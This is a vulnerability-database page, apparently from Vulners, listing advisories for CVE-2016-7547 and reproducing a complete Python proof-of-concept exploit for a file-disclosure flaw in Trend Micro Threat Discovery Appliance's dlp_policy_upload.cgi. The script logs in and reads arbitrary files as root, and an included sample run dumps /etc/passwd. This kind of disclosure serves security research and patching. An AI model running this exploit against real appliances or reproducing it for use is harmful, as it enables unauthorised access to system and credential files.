Vulners
Lucene search
Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Explo
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2016-7547 | 12 Apr 201710:59 | – | attackerkb |
 | CVE-2016-7547 | 29 May 201815:50 | – | circl |
 | Trend Micro Threat Discovery Appliance Command Execution Vulnerability | 20 Apr 201700:00 | – | cnvd |
 | CVE-2016-7547 | 12 Apr 201710:00 | – | cve |
 | CVE-2016-7547 | 12 Apr 201710:00 | – | cvelist |
 | Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution | 10 Apr 201718:32 | – | metasploit |
 | CVE-2016-7547 | 12 Apr 201710:59 | – | nvd |
 | CVE-2016-7547 | 12 Apr 201710:59 | – | osv |
 | Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution | 19 Apr 201700:00 | – | packetstorm |
| Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure | 20 Apr 201700:00 | – | packetstorm |
10
#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
Summary:
========
There exists a post authenticated file disclosure vulnerability that can be used to leak files as root.
Notes:
======
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...
Example:
========
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass> <file>
(+) eg: ./poc.py 172.16.175.123 admin /etc/passwd
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /etc/passwd
(+) logged in...
(+) downloading file...
root:x:0:0:root:/root:/bin/true
tda:x:1:1:nobody:/:/bin/true
monitor:x:1:1:nobody:/:/bin/true
pcap:x:77:77:tcpdump:/var/log:/bin/true
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /var/i_dont_exist
(+) logged in...
(+) downloading file...
(-) file: /var/i_dont_exist doesnt exist!
"""
import re
import sys
import requests
requests.packages.urllib3.disable_warnings()
def remove_last_line_from_string(s):
return s[:s.rfind('\r\n')]
def download_file():
r = s.get("https://%s/cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=%s" % (t, f), verify=False)
data = r.text
if len(data) > 52:
fdata = str(data).split("\n")
fdata.pop()
fdata.pop()
print '\n'.join(fdata)
else:
print "(-) file: %s doesnt exist!" % f
if len(sys.argv) != 4:
print "(+) usage: %s <target> <pass> <file>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin /etc/passwd" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
f = sys.argv[3]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
s = requests.Session()
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
print "(+) downloading file..."
download_file()
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2017 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.89354